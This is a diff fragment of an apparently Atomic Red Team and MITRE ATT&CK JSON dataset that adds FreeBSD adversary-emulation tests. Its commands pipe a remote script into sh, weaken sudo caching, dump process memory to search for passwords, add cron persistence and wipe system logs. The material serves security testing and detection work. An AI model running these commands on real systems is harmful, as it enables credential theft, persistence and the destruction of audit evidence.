"linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if sudo is installed.\n", + "prereq_command": "if [ ! -x \"$(command -v sudo)\" ]; then exit 1; else exit 0; fi;\n", + "get_prereq_command": "(which pkg && pkg install -y sudo)\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "sudo -l \nsudo cat /usr/local/etc/sudoers\nsudo ee /usr/local/etc/sudoers\n" + } + }, { "name": "Unlimited sudo cache timeout", "auto_generated_guid": "a7b17659-dd5e-46f7-b7d1-e6792c91d0bc", @@ -141172,6 +141508,27 @@ "command": "sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers\nsudo visudo -c -f /etc/sudoers\n" } }, + { + "name": "Unlimited sudo cache timeout (freebsd)", + "auto_generated_guid": "a83ad6e8-6f24-4d7f-8f44-75f8ab742991", + "description": "Sets sudo caching timestamp_timeout to a value for unlimited. This is dangerous to modify without using 'visudo', do not do this on a production system.\n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if sudo is installed.\n", + "prereq_command": "if [ ! -x \"$(command -v sudo)\" ]; then exit 1; else exit 0; fi;\n", + "get_prereq_command": "(which pkg && pkg install -y sudo)\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /usr/local/etc/sudoers\nsudo visudo -c -f /usr/local/etc/sudoers\n" + } + }, { "name": "Disable tty_tickets for sudo caching", "auto_generated_guid": "91a60b03-fb75-4d24-a42e-2eb8956e8de1", @@ -141183,7 +141540,28 @@ "executor": { "name": "sh", "elevation_required": true, - "command": "sudo sh -c \"echo Defaults \"'!'\"tty_tickets >> /etc/sudoers\"\nsudo visudo -c -f /etc/sudoers" + "command": "sudo sh -c \"echo Defaults \"'!'\"tty_tickets >> /etc/sudoers\"\nsudo visudo -c -f /etc/sudoers\n" + } + }, + { + "name": "Disable tty_tickets for sudo caching (freebsd)", + "auto_generated_guid": "4df6a0fe-2bdd-4be8-8618-a6a19654a57a", + "description": "Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using 'visudo', do not do this on a production system.\n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if sudo is installed.\n", + "prereq_command": "if [ ! -x \"$(command -v sudo)\" ]; then exit 1; else exit 0; fi;\n", + "get_prereq_command": "(which pkg && pkg install -y sudo)\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "sudo sh -c \"echo Defaults \"'!'\"tty_tickets >> /usr/local/etc/sudoers\"\nsudo visudo -c -f /usr/local/etc/sudoers\n" } } ] @@ -158881,6 +159259,7 @@ "command_list": [ "Invoke-WebRequest \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.bat\" -OutFile $env:TEMP\\discovery.bat\n", "curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh | bash -s > /tmp/T1074.001_discovery.log\n", + "curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh | sh -s > /tmp/T1074.001_discovery.log\n", "Compress-Archive -Path \"\\T1074.001\\bin\\Folder_to_zip\" -DestinationPath $env:TEMP\\Folder_to_zip.zip -Force\n", "cp #{host.file.path[filters(technique=T1005,max=3)]} #{host.dir.staged[filters(max=1)]}\n", "cp #{host.file.path[filters(technique=T1005,max=3)]} #{host.dir.staged[filters(max=1)]}\n", @@ -158940,6 +159319,33 @@ "name": "bash" } }, + { + "name": "Stage data from Discovery.sh (freebsd)", + "auto_generated_guid": "4fca7b49-379d-4493-8890-d6297750fa46", + "description": "Utilize curl to download discovery.sh and execute a basic information gathering shell script\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "output_file": { + "description": "Location to save downloaded discovery.bat file", + "type": "path", + "default": "/tmp/T1074.001_discovery.log" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if curl is installed.\n", + "prereq_command": "if [ ! -x \"$(command -v curl)\" ]; then exit 1; else exit 0; fi;\n", + "get_prereq_command": "(which pkg && pkg install -y curl)\n" + } + ], + "executor": { + "command": "curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh | sh -s > #{output_file}\n", + "name": "sh" + } + }, { "name": "Zip a Folder with PowerShell for Staging in Temp", "auto_generated_guid": "a57fbe4b-3440-452a-88a7-943531ac872a", @@ -177097,10 +177503,11 @@ ], "command_list": [ "cat /etc/passwd > /tmp/T1087.001.txt\ncat /tmp/T1087.001.txt\n", - "sudo cat /etc/sudoers > /tmp/T1087.001.txt\ncat /tmp/T1087.001.txt\n", - "grep 'x:0:' /etc/passwd > /tmp/T1087.001.txt\ncat /tmp/T1087.001.txt 2>/dev/null\n", + "if [ -f /etc/sudoers ]; then sudo cat /etc/sudoers > /tmp/T1087.001.txt; fi;\nif [ -f /usr/local/etc/sudoers ]; then sudo cat /usr/local/etc/sudoers > /tmp/T1087.001.txt; fi;\ncat /tmp/T1087.001.txt\n", + "grep 'x:0:' /etc/passwd > /tmp/T1087.001.txt\ngrep '*:0:' /etc/passwd >> /tmp/T1087.001.txt\ncat /tmp/T1087.001.txt 2>/dev/null\n", "username=$(id -u -n) && lsof -u $username\n", "lastlog > /tmp/T1087.001.txt\ncat /tmp/T1087.001.txt\n", + "lastlogin > /tmp/T1087.001.txt\ncat /tmp/T1087.001.txt\n", "groups\nid\n", "dscl . list /Groups\ndscl . list /Users\ndscl . list /Users | grep -v '_'\ndscacheutil -q group\ndscacheutil -q user\n", "net user\ndir c:\\Users\\\ncmdkey.exe /list\nnet localgroup \"Users\"\nnet localgroup\n", @@ -177157,7 +177564,7 @@ } }, "executor": { - "command": "sudo cat /etc/sudoers > #{output_file}\ncat #{output_file}\n", + "command": "if [ -f /etc/sudoers ]; then sudo cat /etc/sudoers > #{output_file}; fi;\nif [ -f /usr/local/etc/sudoers ]; then sudo cat /usr/local/etc/sudoers > #{output_file}; fi;\ncat #{output_file}\n", "cleanup_command": "rm -f #{output_file}\n", "name": "sh", "elevation_required": true @@ -177179,7 +177586,7 @@ } }, "executor": { - "command": "grep 'x:0:' /etc/passwd > #{output_file}\ncat #{output_file} 2>/dev/null\n", + "command": "grep 'x:0:' /etc/passwd > #{output_file}\ngrep '*:0:' /etc/passwd >> #{output_file}\ncat #{output_file} 2>/dev/null\n", "cleanup_command": "rm -f #{output_file} 2>/dev/null\n", "name": "sh" } @@ -177201,7 +177608,7 @@ { "description": "check if lsof exists\n", "prereq_command": "which lsof\n", - "get_prereq_command": "(which yum && yum -y install lsof)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y lsof)\n" + "get_prereq_command": "(which pkg && pkg install -y lsof)||(which yum && yum -y install lsof)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y lsof)\n" } ] }, @@ -177233,6 +177640,26 @@ "name": "sh" } }, + { + "name": "Show if a user account has ever logged in remotely (freebsd)", + "auto_generated_guid": "0f73418f-d680-4383-8a24-87bc97fe4e35", + "description": "Show if a user account has ever logged in remotely\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "output_file": { + "description": "Path where captured results will be placed", + "type": "path", + "default": "/tmp/T1087.001.txt" + } + }, + "executor": { + "command": "lastlogin > #{output_file}\ncat #{output_file}\n", + "cleanup_command": "rm -f #{output_file}\n", + "name": "sh" + } + }, { "name": "Enumerate users and groups", "auto_generated_guid": "e6f36545-dc1e-47f0-9f48-7f730f54a02e", @@ -179240,23 +179667,21 @@ "id": "attack-pattern--27960489-4e7f-461d-a62a-f5c0cb521e4a", "name": "Application Access Token", "created": "2019-08-30T12:55:58.607Z", - "modified": "2021-09-20T16:50:41.832Z", + "modified": "2023-11-02T15:39:10.534Z", "type": "attack-pattern", "x_mitre_data_sources": [], "x_mitre_contributors": [ - "Jen Burns, HubSpot", "Mark Wee", "Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services)", "Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)", - "Shailesh Tiwary (Indian Army)" + "Shailesh Tiwary (Indian Army)", + "Jack Burns, HubSpot" ], "x_mitre_impact_type": [], "x_mitre_deprecated": false, "x_mitre_effective_permissions": [], "x_mitre_remote_support": false, - "x_mitre_permissions_required": [ - "User" - ], + "x_mitre_permissions_required": [], "x_mitre_is_subtechnique": false, "x_mitre_detection": "Monitor access token activity for abnormal use and permissions granted to unusual or suspicious applications. Administrators can set up a variety of logs and leverage audit tools to monitor actions that can be conducted as a result of OAuth 2.0 access. For instance, audit reports enable admins to identify privilege escalation actions such as role creations or policy modifications, which could be actions performed after initial access.", "x_mitre_defense_bypassed": [ @@ -179264,7 +179689,7 @@ "Logon Credentials" ], "x_mitre_system_requirements": [], - "x_mitre_attack_spec_version": "", + "x_mitre_attack_spec_version": "3.2.0", "revoked": true, "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" @@ -179282,18 +179707,18 @@ "external_id": "", "description": "Auth0. (n.d.). Why You Should Always Use Access Tokens to Secure APIs. Retrieved September 12, 2019." }, - { - "source_name": "okta", - "url": "https://developer.okta.com/blog/2018/06/20/what-happens-if-your-jwt-is-stolen", - "external_id": "", - "description": "okta. (n.d.). What Happens If Your JWT Is Stolen?. Retrieved September 12, 2019." - }, { "source_name": "Microsoft Identity Platform Access 2019", "url": "https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens", "external_id": "", "description": "Cai, S., Flores, J., de Guzman, C., et. al.. (2019, August 27). Microsoft identity platform access tokens. Retrieved October 4, 2019." }, + { + "source_name": "okta", + "url": "https://developer.okta.com/blog/2018/06/20/what-happens-if-your-jwt-is-stolen", + "external_id": "", + "description": "okta. (n.d.). What Happens If Your JWT Is Stolen?. Retrieved September 12, 2019." + }, { "source_name": "Staaldraad Phishing with OAuth 2017", "url": "https://staaldraad.github.io/2017/08/02/o356-phishing-with-oauth/", @@ -186318,6 +186743,7 @@ ], "command_list": [ "if (systemd-detect-virt) then echo \"Virtualization Environment detected\"; fi;\nif (sudo dmidecode | egrep -i 'manufacturer|product|vendor' | grep -iE 'Oracle|VirtualBox|VMWare|Parallels') then echo \"Virtualization Environment detected\"; fi;\n", + "if [ \"$(sysctl -n hw.hv_vendor)\" != \"\" ]; then echo \"Virtualization Environment detected\"; fi\n", "$error.clear()\nGet-WmiObject -Query \"SELECT * FROM MSAcpi_ThermalZoneTemperature\" -ErrorAction SilentlyContinue\nif($error) {echo \"Virtualization Environment detected\"}\n", "if (ioreg -l | grep -e Manufacturer -e 'Vendor Name' | grep -iE 'Oracle|VirtualBox|VMWare|Parallels') then echo 'Virtualization Environment detected'; fi;\n", "$Manufacturer = Get-WmiObject -Class Win32_ComputerSystem | select-object -expandproperty \"Manufacturer\"\n$Model = Get-WmiObject -Class Win32_ComputerSystem | select-object -expandproperty \"Model\"\nif((($Manufacturer.ToLower() -eq \"microsoft corporation\") -and ($Model.ToLower().contains(\"virtual\"))) -or ($Manufacturer.ToLower().contains(\"vmware\")) -or ($Model.ToLower() -eq \"virtualbox\")) {write-host \"Virtualization environment detected!\"} else {write-host \"No virtualization environment detected!\"}\n", @@ -186348,6 +186774,19 @@ "command": "if (systemd-detect-virt) then echo \"Virtualization Environment detected\"; fi;\nif (sudo dmidecode | egrep -i 'manufacturer|product|vendor' | grep -iE 'Oracle|VirtualBox|VMWare|Parallels') then echo \"Virtualization Environment detected\"; fi;\n" } }, + { + "name": "Detect Virtualization Environment (FreeBSD)", + "auto_generated_guid": "e129d73b-3e03-4ae9-bf1e-67fc8921e0fd", + "description": "Detects execution in a virtualized environment.\nAt boot, dmesg stores a log if a hypervisor is detected.\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "if [ \"$(sysctl -n hw.hv_vendor)\" != \"\" ]; then echo \"Virtualization Environment detected\"; fi\n" + } + }, { "name": "Detect Virtualization Environment (Windows)", "auto_generated_guid": "502a7dc4-9d6f-4d28-abf2-f0e84692562d", @@ -186770,6 +187209,7 @@ "command_list": [ "crontab -l > /tmp/notevil\necho \"* * * * * /tmp/evil.sh\" > /tmp/persistevil && crontab /tmp/persistevil\n", "echo \"echo 'Hello from Atomic Red Team' > /tmp/atomic.log\" > /etc/cron.daily/persistevil\necho \"echo 'Hello from Atomic Red Team' > /tmp/atomic.log\" > /etc/cron.hourly/persistevil\necho \"echo 'Hello from Atomic Red Team' > /tmp/atomic.log\" > /etc/cron.monthly/persistevil\necho \"echo 'Hello from Atomic Red Team' > /tmp/atomic.log\" > /etc/cron.weekly/persistevil\n", + "echo \"echo '*/5 * * * * root echo \"Hello from Atomic Red Team\"' > /tmp/atomic.log\" > /etc/cron.d/persistevil\n", "echo \"echo 'Hello from Atomic Red Team' > /tmp/atomic.log\" >> /var/spool/cron/crontabs/persistevil\n" ], "commands": [], @@ -186787,8 +187227,8 @@ "auto_generated_guid": "435057fb-74b1-410e-9403-d81baf194f75", "description": "This test replaces the current user's crontab file with the contents of the referenced file. This technique was used by numerous IoT automated exploitation attacks.\n", "supported_platforms": [ - "macos", - "linux" + "linux", + "macos" ], "input_arguments": { "command": { @@ -186803,7 +187243,7 @@ } }, "executor": { - "name": "bash", + "name": "sh", "command": "crontab -l > /tmp/notevil\necho \"* * * * * #{command}\" > #{tmp_cron} && crontab #{tmp_cron}\n", "cleanup_command": "crontab /tmp/notevil\n" } @@ -186835,6 +187275,32 @@ "cleanup_command": "rm /etc/cron.daily/#{cron_script_name}\nrm /etc/cron.hourly/#{cron_script_name}\nrm /etc/cron.monthly/#{cron_script_name}\nrm /etc/cron.weekly/#{cron_script_name}\n" } }, + { + "name": "Cron - Add script to /etc/cron.d folder", + "auto_generated_guid": "078e69eb-d9fb-450e-b9d0-2e118217c846", + "description": "This test adds a script to /etc/cron.d folder configured to execute on a schedule.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "command": { + "description": "Command to execute", + "type": "string", + "default": "echo '*/5 * * * * root echo \"Hello from Atomic Red Team\"' > /tmp/atomic.log" + }, + "cron_script_name": { + "description": "Name of file to store in cron folder", + "type": "string", + "default": "persistevil" + } + }, + "executor": { + "elevation_required": true, + "name": "sh", + "command": "echo \"#{command}\" > /etc/cron.d/#{cron_script_name}\n", + "cleanup_command": "rm /etc/cron.d/#{cron_script_name}\n" + } + }, { "name": "Cron - Add script to /var/spool/cron/crontabs/ folder", "auto_generated_guid": "2d943c18-e74a-44bf-936f-25ade6cccab4", @@ -191154,13 +191620,18 @@ ], "command_list": [ "sudo rm -rf /var/log/system.log\nif [ -d /var/audit ] ; then sudo rm -rf /var/audit/20220725213300.202208110700021 ; fi\n", + "rm -rf /var/log/messages\nrm -rf /var/log/security\n", "sudo log erase --all\nsudo log erase --ttl #Deletes only time-to-live log content\n", "sudo truncate -s 0 /var/log/system.log #size parameter shorthand\nsudo truncate --size=0 /var/log/system.log #size parameter \n", + "truncate -s 0 /var/log/messages #size parameter shorthand\ntruncate --size=0 /var/log/security #size parameter \n", "sudo cat /dev/null > /var/log/system.log #truncating the file to zero bytes\nsudo dd if=/dev/zero bs=1000 count=5 of=/var/log/system.log #log file filled with null bytes(zeros)\n", + "cat /dev/null > /var/log/messages #truncating the file to zero bytes\ncat /dev/zero > /var/lol/messages #log file filled with null bytes(zeros)\n", "sudo find /var/log -name 'system.log.*' -exec rm {} \\; #using \"rm\" execution\nsudo find /var/log/ -name \"system.log.97.gz.*\" -exec shred -u -z -n 3 {} \\; #using \"shred\" execution\nsudo find /var/log/ -name \"system.log.98.gz.*\" -exec unlink {} \\; #using \"unlink\" execution\n", "sudo echo '' > /var/log/system.log\n", + "echo '' > /var/log/messages\n", "sudo log -f /var/log/system.log | : > /var/log/system.log\n", "sudo unlink /var/log/system.log\n", + "unlink /var/log/messages\n", "sudo shred -u -z -n 3 /var/log/system.log\n", "sudo srm /var/log/system.log #system log file deletion\nsudo srm -r /var/log/ #recursive deletion of log files\n", "osascript -e 'do shell script \"rm /var/log/system.log\" with administrator privileges'\n", @@ -191174,10 +191645,10 @@ "parsed_datasets": [ { "source": "atomics/T1070.002/T1070.002.yaml", - "name": "Atomic Red Team Test - Indicator Removal on Host: Clear Linux or Mac System Logs", + "name": "Atomic Red Team Test - Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs", "content": { "attack_technique": "T1070.002", - "display_name": "Indicator Removal on Host: Clear Linux or Mac System Logs", + "display_name": "Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs", "atomic_tests": [ { "name": "rm -rf", @@ -191213,6 +191684,19 @@ "elevation_required": true } }, + { + "name": "rm -rf", + "auto_generated_guid": "bd8ccc45-d632-481e-b7cf-c467627d68f9", + "description": "Delete messages and security logs\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "rm -rf /var/log/messages\nrm -rf /var/log/security\n", + "name": "sh", + "elevation_required": true + } + }, { "name": "Delete log files using built-in log utility", "auto_generated_guid": "653d39cd-bae7-499a-898c-9fb96b8b5cd1", @@ -191254,6 +191738,19 @@ "elevation_required": true } }, + { + "name": "Truncate system log files via truncate utility (freebsd)", + "auto_generated_guid": "14033063-ee04-4eaf-8f5d-ba07ca7a097c", + "description": "This test truncates the system log files using the truncate utility with (-s 0 or --size=0) parameter which sets file size to zero, thus emptying the file content\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "truncate -s 0 /var/log/messages #size parameter shorthand\ntruncate --size=0 /var/log/security #size parameter \n", + "name": "sh", + "elevation_required": true + } + }, { "name": "Delete log files via cat utility by appending /dev/null or /dev/zero", "auto_generated_guid": "c23bdb88-928d-493e-b46d-df2906a50941", @@ -191282,6 +191779,19 @@ "elevation_required": true } }, + { + "name": "Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd)", + "auto_generated_guid": "369878c6-fb04-48d6-8fc2-da9d97b3e054", + "description": "The first sub-test truncates the log file to zero bytes via /dev/null and the second sub-test fills the log file with null bytes(zeroes) via /dev/zero, using cat utility\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "cat /dev/null > /var/log/messages #truncating the file to zero bytes\ncat /dev/zero > /var/lol/messages #log file filled with null bytes(zeros)\n", + "name": "sh", + "elevation_required": true + } + }, { "name": "System log file deletion via find utility", "auto_generated_guid": "bc8eeb4a-cc3e-45ec-aa6e-41e973da2558", @@ -191340,6 +191850,19 @@ "elevation_required": true } }, + { + "name": "Overwrite FreeBSD system log via echo utility", + "auto_generated_guid": "11cb8ee1-97fb-4960-8587-69b8388ee9d9", + "description": "This test overwrites the contents of system log file with an empty string using echo utility\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "echo '' > /var/log/messages\n", + "name": "sh", + "elevation_required": true + } + }, { "name": "Real-time system log clearance/deletion", "auto_generated_guid": "848e43b3-4c0a-4e4c-b4c9-d1e8cea9651c", @@ -191381,6 +191904,19 @@ "elevation_required": true } }, + { + "name": "Delete system log files via unlink utility (freebsd)", + "auto_generated_guid": "45ad4abd-19bd-4c5f-a687-41f3eee8d8c2", + "description": "This test deletes the messages log file using unlink utility\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "unlink /var/log/messages\n", + "name": "sh", + "elevation_required": true + } + }, { "name": "Delete system log files using shred utility", "auto_generated_guid": "86f0e4d5-3ca7-45fb-829d-4eda32b232bb", @@ -207865,6 +208401,7 @@ ], "command_list": [ "sh /tmp/T1003.007.sh\nPID=$(pgrep -n -f \"T1003.007\")\nHEAP_MEM=$(grep -E \"^[0-9a-f-]* r\" /proc/\"$PID\"/maps | grep heap | cut -d' ' -f 1)\nMEM_START=$(echo $((0x$(echo \"$HEAP_MEM\" | cut -d\"-\" -f1))))\nMEM_STOP=$(echo $((0x$(echo \"$HEAP_MEM\" | cut -d\"-\" -f2))))\nMEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START)))\ndd if=/proc/\"${PID}\"/mem of=\"/tmp/T1003.007.bin\" ibs=1 skip=\"$MEM_START\" count=\"$MEM_SIZE\"\ngrep -i \"PASS\" \"/tmp/T1003.007.bin\"\n", + "sh /tmp/T1003.007.sh\nPID=$(pgrep -n -f \"T1003.007\")\nMEM_START=$(head -n 5 /proc/\"${PID}\"/map | tail -1 | cut -d' ' -f1)\nMEM_STOP=$(head -n 5 /proc/\"${PID}\"/map | tail -1 | cut -d' ' -f2)\nMEM_SIZE=$(echo $(($MEM_STOP-$MEM_START)))\ndd if=/proc/\"${PID}\"/mem of=\"/tmp/T1003.007.bin\" ibs=1 skip=\"$MEM_START\" count=\"$MEM_SIZE\"\nstrings \"/tmp/T1003.007.bin\" | grep -i PASS\n", "sh /tmp/T1003.007.sh\nPID=$(pgrep -n -f \"T1003.007\")\nPYTHON=$(which python || which python3 || which python2)\n$PYTHON /T1003.007/src/dump_heap.py $PID /tmp/T1003.007.bin\ngrep -i \"PASS\" \"/tmp/T1003.007.bin\"\n", "sudo /tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh > /tmp/T1003.007Test3.txt\ncat /tmp/T1003.007Test3.txt\n" ], @@ -207916,10 +208453,48 @@ "cleanup_command": "rm -f \"#{output_file}\"\n" } }, + { + "name": "Dump individual process memory with sh on FreeBSD (Local)", + "auto_generated_guid": "fa37b633-e097-4415-b2b8-c5bf4c86e423", + "description": "Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to\ncopy process memory to an external file so it can be searched or exfiltrated later.\nOn FreeBSD procfs must be mounted.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "output_file": { + "description": "Path where captured results will be placed", + "type": "path", + "default": "/tmp/T1003.007.bin" + }, + "script_path": { + "description": "Path to script generating the target process", + "type": "path", + "default": "/tmp/T1003.007.sh" + }, + "pid_term": { + "description": "Unique string to use to identify target process", + "type": "string", + "default": "T1003.007" + } + }, + "dependencies": [ + { + "description": "Script to launch target process must exist\n", + "prereq_command": "test -f #{script_path}\ngrep \"#{pid_term}\" #{script_path}\n", + "get_prereq_command": "echo '#!/bin/sh' > #{script_path}\necho \"sh -c 'echo \\\"The password is #{pid_term}\\\" && sleep 30' &\" >> #{script_path}\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "sh #{script_path}\nPID=$(pgrep -n -f \"#{pid_term}\")\nMEM_START=$(head -n 5 /proc/\"${PID}\"/map | tail -1 | cut -d' ' -f1)\nMEM_STOP=$(head -n 5 /proc/\"${PID}\"/map | tail -1 | cut -d' ' -f2)\nMEM_SIZE=$(echo $(($MEM_STOP-$MEM_START)))\ndd if=/proc/\"${PID}\"/mem of=\"#{output_file}\" ibs=1 skip=\"$MEM_START\" count=\"$MEM_SIZE\"\nstrings \"#{output_file}\" | grep -i PASS\n", + "cleanup_command": "rm -f \"#{output_file}\"\n" + } + }, { "name": "Dump individual process memory with Python (Local)", "auto_generated_guid": "437b2003-a20d-4ed8-834c-4964f24eec63", - "description": "Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to\ncopy a process's heap memory to an external file so it can be searched or exfiltrated later.\n", + "description": "Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to\ncopy a process's heap memory to an external file so it can be searched or exfiltrated later.\nOn FreeBSD procfs must be mounted.\n", "supported_platforms": [ "linux" ], @@ -209883,7 +210458,7 @@ "command_list": [ "tasklist.exe\nsc query\nsc query state= all\n", "net.exe start >> %temp%\\service-list.txt\n", - "systemctl --type=service\n", + "if [ \"$(uname)\" = 'FreeBSD' ]; then service -e; else systemctl --type=service; fi;\n", "Get-Service" ], "commands": [], @@ -210020,14 +210595,14 @@ } }, { - "name": "System Service Discovery - systemctl", + "name": "System Service Discovery - systemctl/service", "auto_generated_guid": "f4b26bce-4c2c-46c0-bcc5-fce062d38bef", - "description": "Enumerates system service using systemctl\n", + "description": "Enumerates system service using systemctl/service\n", "supported_platforms": [ "linux" ], "executor": { - "command": "systemctl --type=service\n", + "command": "if [ \"$(uname)\" = 'FreeBSD' ]; then service -e; else systemctl --type=service; fi;\n", "name": "bash" } } @@ -210407,6 +210982,7 @@ ], "command_list": [ "tcpdump -c 5 -nnni ens33\ntshark -c 5 -i ens33\n", + "tcpdump -c 5 -nnni em0\ntshark -c 5 -i em0\n", "sudo tcpdump -c 5 -nnni en0A \nif [ -x \"$(command -v tshark)\" ]; then sudo tshark -c 5 -i en0A; fi;\n", "\"c:\\Program Files\\Wireshark\\tshark.exe\" -i Ethernet -c 5\n", "netsh trace start capture=yes tracefile=%temp%\\trace.etl maxsize=10", @@ -210414,6 +210990,8 @@ "pktmon.exe filter add -p 445\n", "sudo /tmp/t1040_macos_pcapdemo -i en0 -t 3\n", "sudo /tmp/t1040_macos_pcapdemo -f -i en0 -t 3\n", + "sudo /tmp/t1040_freebsd_pcapdemo -i em0 -t 3\n", + "sudo /tmp/t1040_freebsd_pcapdemo -f -i em0 -t 3\n", "sudo /tmp/t1040_linux_pcapdemo -a -t 3\n", "sudo /tmp/t1040_linux_pcapdemo -4 -p 6 -t 3\n", "sudo /tmp/t1040_linux_pcapdemo -4 -P -p 17 -t 3\n", @@ -210548,6 +211126,34 @@ "elevation_required": true } }, + { + "name": "Packet Capture FreeBSD using tshark or tcpdump", + "auto_generated_guid": "c93f2492-9ebe-44b5-8b45-36574cccfe67", + "description": "Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be installed.\n\nUpon successful execution, tshark or tcpdump will execute and capture 5 packets on interface ens33.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "interface": { + "description": "Specify interface to perform PCAP on.", + "type": "string", + "default": "em0" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if at least one of tcpdump or tshark is installed.\n", + "prereq_command": "if [ ! -x \"$(command -v tcpdump)\" ] && [ ! -x \"$(command -v tshark)\" ]; then exit 1; else exit 0; fi;\n", + "get_prereq_command": "(which pkg && pkg install -y wireshark-nox11)\n" + } + ], + "executor": { + "command": "tcpdump -c 5 -nnni #{interface}\ntshark -c 5 -i #{interface}\n", + "name": "sh", + "elevation_required": true + } + }, { "name": "Packet Capture macOS using tcpdump or tshark", "auto_generated_guid": "9d04efee-eff5-4240-b8d2-07792b873608", @@ -210749,6 +211355,84 @@ "elevation_required": true } }, + { + "name": "Packet Capture FreeBSD using /dev/bpfN with sudo", + "auto_generated_guid": "e2028771-1bfb-48f5-b5e6-e50ee0942a14", + "description": "Opens a /dev/bpf file (O_RDONLY) and captures packets for a few seconds.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "ifname": { + "description": "Specify interface to perform PCAP on.", + "type": "string", + "default": "em0" + }, + "csource_path": { + "description": "Path to C program source", + "type": "string", + "default": "PathToAtomicsFolder/T1040/src/freebsd_pcapdemo.c" + }, + "program_path": { + "description": "Path to compiled C program", + "type": "string", + "default": "/tmp/t1040_freebsd_pcapdemo" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "compile C program\n", + "prereq_command": "exit 1\n", + "get_prereq_command": "cc #{csource_path} -o #{program_path}\n" + } + ], + "executor": { + "command": "sudo #{program_path} -i #{ifname} -t 3\n", + "cleanup_command": "rm -f #{program_path}\n", + "name": "sh", + "elevation_required": true + } + }, + { + "name": "Filtered Packet Capture FreeBSD using /dev/bpfN with sudo", + "auto_generated_guid": "a3a0d4c9-c068-4563-a08d-583bd05b884c", + "description": "Opens a /dev/bpf file (O_RDONLY), sets BPF filter for 'udp' and captures packets for a few seconds.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "ifname": { + "description": "Specify interface to perform PCAP on.", + "type": "string", + "default": "em0" + }, + "csource_path": { + "description": "Path to C program source", + "type": "string", + "default": "PathToAtomicsFolder/T1040/src/freebsd_pcapdemo.c" + }, + "program_path": { + "description": "Path to compiled C program", + "type": "string", + "default": "/tmp/t1040_freebsd_pcapdemo" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "compile C program\n", + "prereq_command": "exit 1\n", + "get_prereq_command": "cc #{csource_path} -o #{program_path}\n" + } + ], + "executor": { + "command": "sudo #{program_path} -f -i #{ifname} -t 3\n", + "cleanup_command": "rm -f #{program_path}\n", + "name": "sh", + "elevation_required": true + } + }, { "name": "Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo", "auto_generated_guid": "10c710c9-9104-4d5f-8829-5b65391e2a29", @@ -213435,6 +214119,7 @@ "auxiliary/scanner/smb/smb_enumshares", "df -aH\nsmbutil view -g //computer1\nshowmount computer1\n", "sudo smbstatus --shares\n", + "smbstatus --shares\n", "net view \\\\localhost\n", "get-smbshare\n", "net share\n", @@ -213604,6 +214289,39 @@ "elevation_required": true } }, + { + "name": "Network Share Discovery - FreeBSD", + "auto_generated_guid": "77e468a6-3e5c-45a1-9948-c4b5603747cb", + "description": "Network Share Discovery using smbstatus\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "package_checker": { + "description": "Package checking command. pkg info -x samba", + "type": "string", + "default": "(pkg info -x samba &>/dev/null)" + }, + "package_installer": { + "description": "Package installer command. pkg install -y samba413", + "type": "string", + "default": "(which pkg && pkg install -y samba413)" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Package with smbstatus (samba) must exist on device\n", + "prereq_command": "if #{package_checker} > /dev/null; then exit 0; else exit 1; fi\n", + "get_prereq_command": "#{package_installer} \n" + } + ], + "executor": { + "command": "smbstatus --shares\n", + "name": "sh", + "elevation_required": true + } + }, { "name": "Network Share Discovery command prompt", "auto_generated_guid": "20f1097d-81c1-405c-8380-32174d493bbb", @@ -217036,9 +217754,10 @@ "sysinfo, run winenum, 